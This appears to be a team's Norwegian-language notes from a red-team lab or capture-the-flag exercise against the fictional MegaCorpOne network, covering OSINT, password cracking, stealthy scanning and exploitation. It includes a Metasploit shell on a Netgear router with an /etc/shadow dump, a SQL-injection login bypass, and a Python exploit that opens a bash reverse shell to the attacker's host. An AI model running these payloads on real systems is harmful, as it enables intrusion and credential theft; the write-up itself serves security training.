saoijfdwncmwqdsimcn
    • Create new note
    • Create a note from template
      • Sharing URL Link copied
      • /edit
      • View mode
        • Edit mode
        • View mode
        • Book mode
        • Slide mode
        Edit mode View mode Book mode Slide mode
      • Customize slides
      • Note Permission
      • Read
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Write
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Engagement control Commenting, Suggest edit, Emoji Reply
    • Invite by email
      Invitee

      This note has no invitees

    • Publish Note

      Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

      Your note will be visible on your profile and discoverable by anyone.
      Your note is now live.
      This note is visible on your profile and discoverable online.
      Everyone on the web can find and read all notes of this public team.
      See published notes
      Unpublish note
      Please check the box to agree to the Community Guidelines.
      View profile
    • Commenting
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
      • Everyone
    • Suggest edit
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
    • Emoji Reply
    • Enable
    • Versions and GitHub Sync
    • Note settings
    • Note Insights New
    • Engagement control
    • Transfer ownership
    • Delete this note
    • Save as template
    • Insert from template
    • Import from
      • Dropbox
      • Google Drive
      • Gist
      • Clipboard
    • Export to
      • Dropbox
      • Google Drive
      • Gist
    • Download
      • Markdown
      • HTML
      • Raw HTML
Menu Note settings Note Insights Versions and GitHub Sync Sharing URL Create Help
Create Create new note Create a note from template
Menu
Options
Engagement control Transfer ownership Delete this note
Import from
Dropbox Google Drive Gist Clipboard
Export to
Dropbox Google Drive Gist
Download
Markdown HTML Raw HTML
Back
Sharing URL Link copied
/edit
View mode
  • Edit mode
  • View mode
  • Book mode
  • Slide mode
Edit mode View mode Book mode Slide mode
Customize slides
Note Permission
Read
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Write
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Engagement control Commenting, Suggest edit, Emoji Reply
  • Invite by email
    Invitee

    This note has no invitees

  • Publish Note

    Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

    Your note will be visible on your profile and discoverable by anyone.
    Your note is now live.
    This note is visible on your profile and discoverable online.
    Everyone on the web can find and read all notes of this public team.
    See published notes
    Unpublish note
    Please check the box to agree to the Community Guidelines.
    View profile
    Engagement control
    Commenting
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    • Everyone
    Suggest edit
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    Emoji Reply
    Enable
    Import from Dropbox Google Drive Gist Clipboard
       Owned this note    Owned this note      
    Published Linked with GitHub
    • Any changes
      Be notified of any changes
    • Mention me
      Be notified of mention me
    • Unsubscribe
    # ComFuzz --- ## Første ideer * Vi skal skaffe aksess slik at informasjon fra nettverket ikke havner i feil hender * Hva brukes maskinene til? * Innhente informasjon om befolkningen * Kan vi forhindre denne funksjonaliteten ved å få aksess? * Kan legge inn skadevare på maskinene slik at vi har bakdører og full kontroll over maskinene --- ## Plan * Sette målsetninger og definere grenser * Hvor mye støy er greit? * Jobbe etter Cyber Kill Chain-modellen? * Få initiell oversikt over nettverket * OSINT * Enumerering? * Finne inngangsvektorer --- ## OSINT * Hvilke spor legges igjen når vi gjør søk i åpne kilder? * IP, UserAgent, * Bør skjule IP adresse som f.eks benyttes til å besøke nettsider da denne trafikken vil logges (VPN/TOR) * Vi kan akseptere at noen spor legges igjen, men må ha i bakhodet hele tiden hvordan vi går frem * Fant passordhash og brukernavn en pull request i GITHub * Can crackes og gi initiell tilgang til nettverket * Kildekode til megacorpone.com ligger åpent på GitHub * Kan gjøre kildekodeanalyse og se etter sårbarheter * Sikkerhetsprodukt er starred i Git * https://github.com/alienfault/ossim * Kan indikere at de benytter dette som intern sikkerhetsløsning * Laget fake Facebook-konto for å undersøke kontoene vi fant * Siden ikke tilgjengelig * Finner ikke konto ved søk --- ## Enumerering * Har flere IPer og domener, utføre scanning mot disse? * Hvor mye støy genererer dette? Finnes det bedre alternativer? * Ping-scanning git relativt lite støy * Utføre scanning fra utsiden av nettverket eller forsøke initiell aksess før vi scanner? ## Initiell aksess * Hva må passes på? * Honeypots, deteksjonskapabiliteter * Begynne med å cracke passordhash * Finner ikke riktig mode * Løste seg (mode 1600 i hashcat) * Har en liste med brukernavn, kan password spraye mot disse * Støyete, bør kanskje unngås Ressurser: * https://github.com/megacorpone/ * https://www.facebook.com/MegaCorp-One-393570024393695/ * https://twitter.com/joe_sheer/ * https://www.linkedin.com/company/megacorp-one * https://www.megacorpone.com/ * 149.56.244.87 * https://github.com/megacorpone/megacorpone.com/blob/master/megacorpone/xampp.users Of interest: `support.megacorpone.com` Er nede; ```support.megacorpone.com. 56 IN A 51.222.169.218``` Intranet: ```intranet.megacorpone.com. 274 IN A 51.222.169.211``` mecacorpone registar: ``` Registry Registrant ID: Registrant Name: Alan Grofield Registrant Organization: MegaCorpOne Registrant Street: 2 Old Mill St Registrant City: Rachel Registrant State/Province: Nevada Registrant Postal Code: 89001 Registrant Country: US Registrant Phone: +1.9038836342 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 3310f82fb4a8f79ee9a6bfe8d672d87e-1696395@contact.gandi.net ... DNSSEC: Unsigned ``` HQ på kart: \https://www.google.com/maps/place/37%C2%B038'45.6%22N+115%C2%B044'49.5%22W/@37.646001,-115.7476837,514m/data=!3m2!1e3!4b1!4m6!3m5!1s0x0:0xbcec76de1541ea52!7e2!8m2!3d37.646001!4d-115.7470871!5m1!1e) Personer / Kontoer | Person | Rolle | Kontoer | Epost / Brukernavn? | | ------------- | ------------------------ | ----------------------------------------------------------- | ------------------------- | | Joe Sheer | CEO | [Twitter:@Joe_Sheer](https://nitter.it/joe_sheer/) | joe@megacorpone.com | | Tom Hudson | Designer | [Twitter:@TomHudsonMCO](https://nitter.it/TomHudsonMCO) | thudson@megacorpone.com | | Tanya Rivera | Senior Developer | [Twitter:@TanyaRiveraMCO](https://nitter.it/TanyaRiveraMCO) | trivera@megacorpone.com | | Matt Smith | Marketing director | [Twitter:@MattSmithMCO](https://nitter.it/MattSmithMCO) | msmith@megacorpone.com | | Mike Carlow | VP Legal | | mcarlow@megacorpone.com | | Alan Grofield | IT and Security Director | | agrofield@megacorpone.com | | HR | | | hr@megacorpone.com | | Sales | Sales | | sales@megacorpone.com | | Shipping | | | shipping@megacorpone.com | Finnes ikke * https://www.megacorpone.com/.well-known/security.txt * http://megacorpone.com/sitemap.xml Robots.txt: ``` User-agent: * Allow: / Allow: /nanites.php ``` nanites.php insinuere at vi er i Rachel, NV, USA Nanites - microrobotics: https://en.wikipedia.org/wiki/Nanorobotics Funn av XAMPP bruker og hash i Github: * https://github.com/megacorpone/megacorpone.com/pull/1/commits/fe1f303e85c9ccdaef53b5eef8ff1d25d46c5389 * `trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0` HashID sier dette er en MD5(APR) eller Apache MD5 hash Crackes via `hashcat -a 0 -m 1600 hash.txt rockyou.txt` => Tanya4life (raskere å cracke i motsatt retning, `tac rockyou.txt > yockrou.txt`) ## System info Fra stillingsutlysningside: - Bruker Citrix for remote access - Firepass firewall ## Foreløpig status * Har passord og brukernavn til en konto * Har en liste over navn og eposter til ansatte * Citrix brukes for remote access, Firepass firewall, OS-Sim nettverksmonitorering? * Har offentlige IPer og kjenner til flere subdomener intranet.megacorpone.com og support.megacorpone.com * intranet.megacorpone.com: 51.222.169.211 * support.megacorpone.com: 51.222.169.218 * www.megacorpone.com: 149.56.244.87 * mail2.megacorpone.com: 51.222.169.213 * mail.megacorpone.com: 51.222.169.212 * vpn.megacorpone.com: 51.222.169.220 ## Videre aktivitet * Scanne IPer eller domener * Kjenner en rekke IPer, men ikke tjenestene som finnes på dem * Interessante porter for workstations: * 53 - DNS * 88 - Kerberos * 135 - RPC * 445 - SMB * Bruke jump host til å logge inn på brukerkonto? * Bruke infrastruktur i et land vi vet Utlandia ikke har samarbeid med slik at informasjon ikke blir utlevert * Lytter etter trafikk som broadcastes til alle enheter på VPN med Wireshark * Firepass brukte følgende porter i 2018: * https://support.f5.com/csp/article/K3558 * Liste over Citrix porter: * https://docs.citrix.com/en-us/tech-zone/build/tech-papers/citrix-communication-ports.html * Undersøke web-tjeneste? * Mulige problemer: * Skiller trafikken seg ut? * User agent, IP * Sjekke port 80 - naturlig med mye trafikk hit, skiller seg ikke ut. * Sørge for at SRC er en maskin som ikke skiller seg ut - Windows maskin fra intern IP * Enumerere SMB shares i nettverket? Antakeligvis åpen på mange hosts og vi har credentials til en bruker * Scanne etter åpne port 139 på kandidater ## OPSEC * Bruke eksisterende pakker som ligner for ikke bli tatt * Ringe tlf via vpn med online offentlig VoIPtjeneste * * Ping scanne alle hoster internt på nettverket * Ikke veldig uvanlig at scanning gjøres, men suspekt at det kommer fra intern IP, kan bli detektert * Hvordan scanne med mest mulig OPSEC-hensyn? * Bruke bare windows til a utforske windowsgreier | IP | CP Navn | Info/Pakke | | ------------- | ------- | ----------------------------------------------------- | | 172.16.10.20 | | Host Ann. PDC | | 172.16.10.22 | | Host Ann. BARYONIC | | 172.16.10.26 | | Host Ann. WS02 | | 172.16.10.27 | | Host Ann. WS03 | | 172.16.10.28 | | Host Ann. WS04 | | 172.16.10.29 | | Host Ann. WS05 | | 172.16.10.30 | | Host Ann. ABUTMENT | | 172.16.10.31 | | Host Ann. MUON | | 172.16.10.32 | | Host Ann. ORBITON | | 172.16.10.55 | | Local Master Ann. LT01, Domain/Workgroup Ann. MC0 | | 172.16.10.66 | BORON | SSDP Platinum UPnP | | 172.16.10.80 | | Host Ann. PROXIMA | | 172.16.10.85 | | Host Ann. CHROMIUM | | 172.16.10.114 | | Host Ann. THUNDARA | | 172.16.10.116 | | Host Ann. Local Master | | 172.16.10.125 | OZONE | Host Ann. WEB | | 172.16.10.127 | | Host Ann. DC02 | | 172.16.10.128 | | Host Ann. DC01 | | 172.16.10.130 | | Host Ann. CLIENT01 | | 172.16.10.140 | | MDNS, LLMNR | | 172.16.10.141 | | Host Ann. LEGOLAS | | 172.16.10.142 | | Host Ann. HAWKEYE | | 172.16.10.144 | | Host Ann. HOOD - other protocols: SSDP, SMB MAILSLOT, | | 172.16.10.162 | | Host Ann. LT02 | | 172.16.10.168 | | Host Ann. ARCDC | | 172.16.10.169 | | Host Ann. ARCCA | | 172.16.10.185 | | Host Ann. PERUSAL | | 172.16.10.221 | | Host ann. CORAX - other protocols: NBNS, MDNS, LLMNR | 172.16.10.114, 116, og 117 er ikke relevante da disse er fra ThunderCorp! # Task Backlog - [ ] Set up citrix env locally for test - [ x ] Find kjente citrix exploits - Masse muligheter mtp kjente CVE'er - [ x ] Find kjente firepass exploits - Ingen CVE siden 2013. - [ ] Lær mer i dybde om AD - [ ] Learn how mDNS works - Spoofing? - [ ] Scanne kjente IPer og enumerere tjenester - [ ] Understand M-SEARCH in SSDP - [ ] Also Platinum UPnP is very related? ## Funn oppdaert * Funnet en rekke hosts internt på nettverket * Windows host discovery * 224.0.0.251 mDNS * UPnP/1.0 DLNADOC/1.50 Platinum/1.0.5.13 - Broadcast as SSDP from .10.66 * Firefox for Android prior to version 79 did not properly validate the schema of the URL received in SSDP [Fra wikipedia](https://en.wikipedia.org/wiki/Simple_Service_Discovery_Protocol) ## 172.16.10.125 Port 80 * Welcome To Prominent Studios * Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.2 * Ingen åpenbare sårbarheter som kan utnyttes, relativt ny * Ingen input-felter eller annet som kan utnyttes direkte * finner ingen subdomener eller foldere på serveren * Må aktivt scannes for å finne veier til aksess via web serveren ## Må begynne med mer aggresiv strategi * Scanne Webside * Scanne SMB Shares * https://superuser.com/questions/1492010/finding-all-samba-shares-in-local-network * Annen scanning mot AD * UPnP * Bruke windows til a mappe SMB shares * Finne alternativ for verktoy, bruke minst noisy ## Ops: SAMBA1 / PLEX * Har creds * Logge pa .10.66 med creds? 10.66 var veldig verbos i broadcast * Nichlas prover * Hvorfor: Utforske mulige ingangsvektorer ved a hente informasjon fra SAMBA pa maskin * Ingen RDP * Hvilke spor legger vi igjen? * Logger over IP, User agent, Host, Kommandoer * Benytter smbclient for å enumerere * Anonymous . . . ### Res: * PLEX * Får listet data med Anonymous som brukernavn * Creds for trivera fungerer for innlogging * Lister shares - print$ - VIDZ - IPC$ (computadora server) * VIDZ/Application Support` * /Logs * Ligger mange DLNA log-filer. Indikerer at DLNA er skrudd på. Kan se nærmere på port 1900 ![](https://i.imgur.com/yFj1FvQ.png) Plex Media Server - Vektor? ![](https://i.imgur.com/lDX5jtY.png) * Får enumerert VIDZ som trivera * Får også enumerert VIDZ som anonymous Hva er COMPUTADORA workgroup * Workgroups: MCO og WORKGROUP Config-fil: ```<MediaContainer SETTINGS_SEE_TABLE_BELOW> <Directory count="1" key="activities" title="activities"/> <Directory count="1" key="butler" title="butler"/> <Directory count="1" key="channels" title="channels"/> <Directory count="1" key="clients" title="clients"/> <Directory count="1" key="diagnostics" title="diagnostics"/> <Directory count="1" key="hubs" title="hubs"/> <Directory count="1" key="library" title="library"/> <Directory count="3" key="livetv" title="livetv"/> <Directory count="3" key="media" title="media"/> <Directory count="1" key="neighborhood" title="neighborhood"/> <Directory count="1" key="playQueues" title="playQueues"/> <Directory count="1" key="player" title="player"/> <Directory count="1" key="playlists" title="playlists"/> <Directory count="1" key="resources" title="resources"/> <Directory count="1" key="search" title="search"/> <Directory count="1" key="server" title="server"/> <Directory count="1" key="servers" title="servers"/> <Directory count="1" key="statistics" title="statistics"/> <Directory count="1" key="system" title="system"/> <Directory count="1" key="transcode" title="transcode"/> <Directory count="1" key="updater" title="updater"/> </MediaContainer> ``` | Setting | Value | | ----------------------------- | ------------------------------------------------------------------ | | AllowMediaDeletion | "1" | | allowSharing | "1" | | allowSync | "0" | | allowTuners | "1" | | backgroundProcessing | "1" | | companionProxy | "1" | | diagnostics | "logs,databases,streaminglogs" | | eventStream | "1" | | friendlyName | "computadora" | | hubSearch | "1" | | itemClusters | "1" | | livetv | "6" | | machineIdentifier | "fec06f941bc57d1f123449afdb7dddd8560d5330" | | mediaProviders | "1" | | multiuser | "1" | | myPlex | "1" | | myPlexMappingState | "unknown" | | myPlexSigninState | "none" | | myPlexSubscription | "0" | | photoAutoTag | "1" | | platform | "Linux" | | platformVersion | "4.4.0-116-generic (#140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018)" | | pluginHost | "1" | | readOnlyLibraries | "0" | | requestParametersInCookie | "1" | | streamingBrainVersion | "2" | | sync | "1" | | transcoderActiveVideoSessions | "0" | | transcoderAudio | "1" | | transcoderLyrics | "1" | | transcoderPhoto | "1" | | transcoderSubtitles | "1" | | transcoderVideo | "1" | | transcoderVideoBitrates | "64,96,208,320,720,1500,2000,3000,4000,8000,10000,12000,20000" | | transcoderVideoQualities | "0,1,2,3,4,5,6,7,8,9,10,11,12" | | transcoderVideoResolutions | "128,128,160,240,320,480,768,720,720,1080,1080,1080,1080" | | updatedAt | "1613402705" | | updater | "1" | | version | "1.13.0.5023-31d3c0c65" | ## Next steps: - Vuln i Plex? - Finne versjon? - OS? Warning about insecure ports: ![](https://i.imgur.com/cZ0lPP1.png) [Plex runs on](https://support.plex.tv/articles/201543147-what-network-ports-do-i-need-to-allow-through-my-firewall/) TCP:32400 Other related ports: - UDP:1900 DLNA - UDP:5353 Old Bonjour/Avahi discovery - TCP:8324 Control Plex for Roku via Plex Companion - UDP: 32410, 32412, 32413, 32414 (current GDM network discovery) ## OPS: Plex UI - Use webserver on flex. Natural usage. - Går inn på 172.16.10.66:32400 - Redirected til index.html ved første request - Fant en config-fil ved å sende request direkte til http://172.16.10.66:32400/ - Avslørte at OS er Ubuntu - JS code beautified: http://dpaste.com//258JTEA5F ## OPS: SSH1 - Siden OS var Linux sjekket vi om SSH var oppe - det var den - trivera med Tanya4life funket ikke som creds # TIRSDAG ## Prep: - Installer Plex lokalt med tilsvarende config, se hva som skjer - Lastet ned korrekt versjon fra plex.tv: [1.13.0.5023-31d3c0c65](https://downloads.plex.tv/plex-media-server/1.13.0.5023-31d3c0c65/plexmediaserver_1.13.0.5023-31d3c0c65_amd64.deb) - Config pa lokal version er identisk med den som er pa server. Default installasjon? - CVE-2018-13415 Exploit 1.13.2. - Kjerne 4.4.0-116-generic pa Ubuntu er veldig gammel. Dirty COW - Dirty Cow ustabil. PrivEsc med https://www.exploit-db.com/ [(arkiv)](https://web.archive.org/web/20220519144849/https://www.exploit-db.com/exploits/44298) ## CVE 2018-13415 * Usikker på om den fungerer på Linux domains * RCE delen står spesifisert at den fungerer i windows domains * Kan hende at vi kan få tilgang til filsystemet * Kan dette gi oss noe viktig informasjon? * Muligens noe informasjon som kan gi ytterliggere tilgang, creds, logger ## Ingen action Gar ikke videre med a angripe Plex - ser ikke nok utbytte. ## OPS: ARP Scan | IP | MAC | Provider | | ------------- | ----------------- | ------------------ | | 172.16.10.1 | 58:9c:fc:00:45:3b | FreeBSD Foundation | | 172.16.10.10 | 00:50:56:92:f1:dd | VMware, Inc. | | 172.16.10.11 | 00:50:56:92:1e:58 | VMware, Inc. | | 172.16.10.20 | 00:50:56:92:e6:8c | VMware, Inc. | | 172.16.10.22 | 00:50:56:92:91:44 | VMware, Inc. | | 172.16.10.25 | 00:50:56:92:01:45 | VMware, Inc. | | 172.16.10.26 | 00:50:56:92:9c:67 | VMware, Inc. | | 172.16.10.27 | 00:50:56:92:9e:55 | VMware, Inc. | | 172.16.10.28 | 00:50:56:92:da:0c | VMware, Inc. | | 172.16.10.29 | 00:50:56:92:ba:81 | VMware, Inc. | | 172.16.10.30 | 00:50:56:92:3c:b7 | VMware, Inc. | | 172.16.10.31 | 00:50:56:92:44:67 | VMware, Inc. | | 172.16.10.32 | 00:50:56:92:39:e5 | VMware, Inc. | | 172.16.10.35 | 00:50:56:92:eb:a7 | VMware, Inc. | | 172.16.10.44 | 00:50:56:92:a9:fd | VMware, Inc. | | 172.16.10.46 | 00:50:56:92:4a:db | VMware, Inc. | | 172.16.10.55 | 00:50:56:92:0d:d6 | VMware, Inc. | | 172.16.10.61 | 00:50:56:92:0a:91 | VMware, Inc. | | 172.16.10.66 | 00:50:56:92:0f:a7 | VMware, Inc. | | 172.16.10.75 | 00:50:56:92:9d:d6 | VMware, Inc. | | 172.16.10.76 | 00:50:56:92:fb:af | VMware, Inc. | | 172.16.10.77 | 00:50:56:92:06:23 | VMware, Inc. | | 172.16.10.80 | 00:50:56:92:6f:92 | VMware, Inc. | | 172.16.10.85 | 00:50:56:92:19:b0 | VMware, Inc. | | 172.16.10.114 | 00:50:56:92:3f:63 | VMware, Inc. | | 172.16.10.116 | 00:50:56:92:18:9b | VMware, Inc. | | 172.16.10.117 | 00:50:56:92:db:11 | VMware, Inc. | | 172.16.10.125 | 00:50:56:92:87:27 | VMware, Inc. | | 172.16.10.126 | 00:50:56:92:fe:84 | VMware, Inc. | | 172.16.10.127 | 00:50:56:92:68:17 | VMware, Inc. | | 172.16.10.128 | 00:50:56:92:e6:a0 | VMware, Inc. | | 172.16.10.130 | 00:50:56:92:b1:81 | VMware, Inc. | | 172.16.10.131 | 00:50:56:92:5b:b1 | VMware, Inc. | | 172.16.10.140 | 00:50:56:92:3f:d2 | VMware, Inc. | | 172.16.10.141 | 00:50:56:92:8b:44 | VMware, Inc. | | 172.16.10.142 | 00:50:56:92:9b:17 | VMware, Inc. | | 172.16.10.143 | 00:50:56:92:30:c3 | VMware, Inc. | | 172.16.10.144 | 00:50:56:92:fe:5e | VMware, Inc. | | 172.16.10.145 | 00:50:56:92:13:f9 | VMware, Inc. | | 172.16.10.162 | 00:50:56:92:d7:27 | VMware, Inc. | | 172.16.10.167 | 00:50:56:92:d3:15 | VMware, Inc. | | 172.16.10.168 | 00:50:56:92:db:b3 | VMware, Inc. | | 172.16.10.169 | 00:50:56:92:4d:10 | VMware, Inc. | | 172.16.10.185 | 00:50:56:92:c1:28 | VMware, Inc. | | 172.16.10.186 | 00:50:56:92:90:11 | VMware, Inc. | | 172.16.10.187 | 00:50:56:92:ab:cc | VMware, Inc. | | 172.16.10.200 | 00:50:56:92:97:32 | VMware, Inc. | | 172.16.10.201 | 00:50:56:92:6b:ec | VMware, Inc. | | 172.16.10.221 | 00:50:56:92:51:da | VMware, Inc. | ## OPS: WebSearch To alternativer: **Alt 1: NMAP Stealth** https://nmap.org/book/nmap-defenses-detection.html Etter ARP-scan vil vi finner servere med typiske porter. Portkandiater Http(s): 80, 443. 443 impliserer ofte at 80 er apen. Ønsker å finne citrix server. Noisy? CitrixXen kjorer på https. Har de Xen mon tro? 22: Alarm? 3390: Er det mye trafikk? Kan god uttelling Velger å bare scanne port 80 i foeaurste omgang. User Agent: `UPnP/1.0 DLNADOC/1.50 Platinum/1.0.5.13` Kommandoer: `nmap -T0 -Pn -p 80 -oG logfile.gnmap 172.16.10.0/24` Kommandoer: `nmap -T0 -Pn -p 22,3390 -oG logfile.gnmap 172.16.10.0/24` Ønsker å være så stealthy som mulig If stealth is your goal: * Avoid obvious tools (like SQLMap) or ensure they have settings to hide things like a User-Agent string. (e.g., sqlmap --user-agent=Benign/1.0) * Go slowly and as targeted as possible. Know your target before you try to hit it. Surgical precision is better than brute force if you need ot be quiet. * Ønsker å spre scanningen utover en lengre tidsperiode for å ikke bli detektert * Bruker -T 0 som option **Alt 2: Bruke browsere direkte.** Mye manuelt arbeid. Legger trolig igjen mer overhead/metadata. **Go Nmap** ## Resultat Folgende ip-er har port 80 apen: | IP-addr | Innhold | | ------------- | ------------------------------------------------- | | 172.16.10.10 | Gitlab | | 172.16.10.11 | Redirects to /login and then Connection failed? | | 172.16.10.27 | Apache login xampp. Trivera login here! | | 172.16.10.35 | Qube gaming | | 172.16.10.44 | Web2Project login page Version 3.3.66 | | 172.16.10.46 | File sharing / Pontem | | 172.16.10.61 | Blank | | 172.16.10.75 | 503 service unavailable Microsoft-HTTPAPI/2.0 | | 172.16.10.77 | OwnCloud webservices | | 172.16.10.125 | Prominent studios | | 172.16.10.141 | Windows server IIS | | 172.16.10.145 | Welcome to NginX | | 172.16.10.167 | Arcweb services | | 172.16.10.169 | Windows server IIS | | 172.16.10.200 | Netgear access point | ## OPS: Trivial Trivera Loging in with credentials we found on the HTTP basic AUTH ## Result Login successful ## XAMPP 172.16.10.27 - Versjon 1.7.2 * XAMPP is a completely free, easy to install Apache distribution containing MariaDB, PHP, and Perl. * Needs client to log in to managing * Server versions: * Apache/2.2.12 (Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_perl/2.0.4 Perl/v5.10.0 * Found in page not found http://172.16.10.27/xampp/status.phpp ![](https://i.imgur.com/EkKJdNj.png) Exploits: * https://www.exploit-db.com/exploits/10391 - Set root password ## OPS: Trivera Gitlab Reuse Check if Trivera reuse password on gitlab. ## Result: She does not :( ## OPS: Netgear logins Hvorfor: Innhente mye info om nettvek, og fa tilgang til a styre hele nettverksflyt pa tilkoblede enheter. Kan hente trafikklogger etc. ## Resultat Bruker: admin Passord: password Veldig veldig treg.. *TREG* **slow** Vi kjøpte samme ruter med samme firmware i et identisk nettverksoppsett og prøvde å få shell på denne. Det fikk vi via metasploit: ``` $ msfconsole > use exploit/linux/http/netgear_unauth_exec > set LHOST 172.16.10.248 > set RHOSTS 172.16.10.200 > set SRVHOST 172.16.10.248 > exploit [...] [*] Server stopped. whoami root ``` i `/root/proof.txt` ligger flagget: - access{fbf4f621991c2e0f5911cc8d8c0d8ee3} shadow: ``` cat /etc/shadow root:$1$z7ix/gfG$/bjrBR2LZEK3UK6WpLjCl/:10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: adm:*:10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody:*:10933:0:99999:7::: admin:$1$.6IhIu7J$xn/wkxJHyXv.puP/2Srbx/:10933:0:99999:7::: ``` ## OPS: FTP Hvorfor: * FTP er ikke aktivert by default * Ofte mulig å logge inn uten creds * Hvis ikke kan vi prøve trivera sine * Kan finne interessante filer på serveren Hvordan: * forsøke å logge inn som anonymous * Hvis dette ikke fungerer forsøke å logge inn som trivera * Deretter lete forsiktig rundt i filsystemet for å se hva vi finner Resultat: * Klarte å logge inn som anonymous * Fant en git-mappe * Inneholdt akkurat samme innhold som Github * Fant ingen informasjon som var verdt å eksfilterere * Innebærer en risk, og sjansen for at vi finner noe interessant er liten * Version 0. Resultat ved login som trivera: ![](https://i.imgur.com/LhvUa6W.png) ![](https://i.imgur.com/xua0qFb.png) * Ingen ytterliggere tilgang ## XAMPP flere muligheter * https://packetstormsecurity.com/files/83547/XAMPP-1.7.2-Administrative-Bypass.html * Versjonen er sårbar for en admin bypass * Kan besøke http://172.16.10.27/security/xamppsecurity.php og endre passordet * Må finne ut hva passordet kan brukes til * Passord er trolig lagret i * (File: C:\xampp\security\mysqlrootpasswd.txt) * (File: C:\xampp\security\xamppdirpasswd.txt) * Kan vi bruke FileZilla+vuln til a hente passwdfiler? * Logge inn som trivera? * Fikk opp usage statistics ut av det blå * Klarer ikke å gjenskape denne siden ![](https://i.imgur.com/2Nwbnj0.png) ![](https://i.imgur.com/q7i0JQv.png) ![](https://i.imgur.com/lrCJJrA.png) ![](https://i.imgur.com/j5TZXbT.png) ![](https://i.imgur.com/j94XUGh.png) * Filezilla er gammel versjon og sårbar for https://github.com/NeoTheCapt/FilezillaExploit/blob/master/FuckFilezilla_0_9_41.php * Ulempe: lager bruker og legger igjen en del spor * Utfordring å finne en måte å laste opp og akessere fil ## Perl * Perl er installert på serveren og er versjon 5.10.0 * Sårbar for CVE-2012-6329, men virker ikke som vi kan exploite den ## OPS: MySQL trivera reuse Hvorfor: Finne informasjon som f.eks. passord til videre tilgang, innflytelse pa websystemer. Finne info for lateral bevegelse i nettverk. ## OPS: XAMPP Hvorfor: for å få shell på en maskin Funn av http://172.16.10.27/megacorpone/ hvor filene fra FTP serveren til XAMPP kjører. Prøv å få reverse shell via opplastet PHP fil. ## OPS: GoAdmin * Port 80 er åpen, kommer her til en login page * Admin page er sårbar for SQL injection * https://vuldb.com/?id.75240 * Logger inn som admin:`' or '1'='1'-- ` * Fikk tilgang til Dashboard * Creds til admin-profilen: * admin:ruAWYPLCPcK3dZ3P ![](https://i.imgur.com/5iDaabm.png) * Følgende services kjører på serveren: ![](https://i.imgur.com/4W6xjqf.png) * Under https://172.16.10.11/scripts kan man legge til scripts * Kan brukes til å få shell? * Liste over sårbarheter i GoAdmin 3.3 * https://vulmon.com/searchpage?q=goadmin+ce * https://vulmon.com/vulnerabilitydetails?qid=CVE-2015-2844&scoretype=cvssv3 * 172.16.10.11/index.php/go_site/cpanel/{payload} * skal kunne gi shell * Alternativt https://vulmon.com/vulnerabilitydetails?qid=CVE-2015-2842&scoretype=cvssv3 * File upload som gir RCE Audiostore: https://github.com/goautodial/ce-v3-www/search?q=audiostore CVE-2015-2844 og CVE-2015-2845 gir RCE med URL. Skreiv pythonscript: ```python import requests from base64 import b64decode, b64encode import netifaces as ni ip = ni.ifaddresses('tap0')[ni.AF_INET][0]['addr'] lhost = ip rhost = "https://172.16.10.11" shellport = 4445 proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", } s = requests.session() r = s.post(rhost+"/index.php/go_login/validate_credentials", data={ "user_name":"admin", "user_pass":"' or '" },proxies=proxies, verify=False) r.content cmd = b64encode(f"bash -i >& /dev/tcp/{lhost}/{shellport} 0>&1".encode()).decode() payload_url = rhost+f"/index.php/go_site/cpanel/|echo -n {cmd} | base64 --decode| bash &" r = s.get(payload_url, proxies=proxies, verify=False) ``` i ~/hash.txt: flumen{5c9b271cf330bb05e632da0ffa7f7015} ## OPS:172...61 Kjore nmap fra ruter. Fant phpsys (port 2000) med nmap -F Returnerer blank nettside Server Apache/2.4.18 (Ubuntu) Check path traversal vuln - nope ZeroDay i [languages](https://cxsecurity.com/issue/WLB-2016020013) # Onsdag ## Planer videre * Vurderer å bruke kompromiterte maskiner som jumphosts * C2? * Ønsker å ta over domenekontrolleren, men vil også komrpmittere flest mulig maskiner * Kvalitet vs kvantitet på aksessen * Jobber parallellt med XAMPP og undersøkelser på domenekontroller ## PLAN: XAMPP Headers: Apache/2.2.12 (Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_perl/2.0.4 Perl/v5.10.0 PhPMyAdmin : Vet ikke version Bruker PHP 5.3.0 fra 2009. PHPMyAdmin version bor da vaere rundt omkring 3.2.9 [phpmyadmin release list](https://www.phpmyadmin.net/files/) [apachefriends](https://www.apachefriends.org/blog/news-article-146986.html) antyder at XAMPP version 1.7.2 sendes sammen med PHPMyAdmin 3.2.0.1. Mulige CVE-er: [2011-2506 2011-2505](https://www.exploit-db.com/exploits/17514) Demo script. ## Undersøkelser av domenekontroller * Vet at 172.16.10.127 er domenekontroller basert på hostname som vi fant under passiv scanning * Første mål: Finne hvilke porter som skal scannes * 53: DNS * 88: Kerberos * 135: RPC * 139: NetBios * 445: SMB * Mulige angrep: * Kerberoasting * AsRepRoasting * Pass the hash/Pass the ticket * Kan undersøke om trivera gjenbruker passordet og gir aksess til SMB shares eller noe annet * Kan bli vannskelig å angripe domenekontroller direkte, bedre 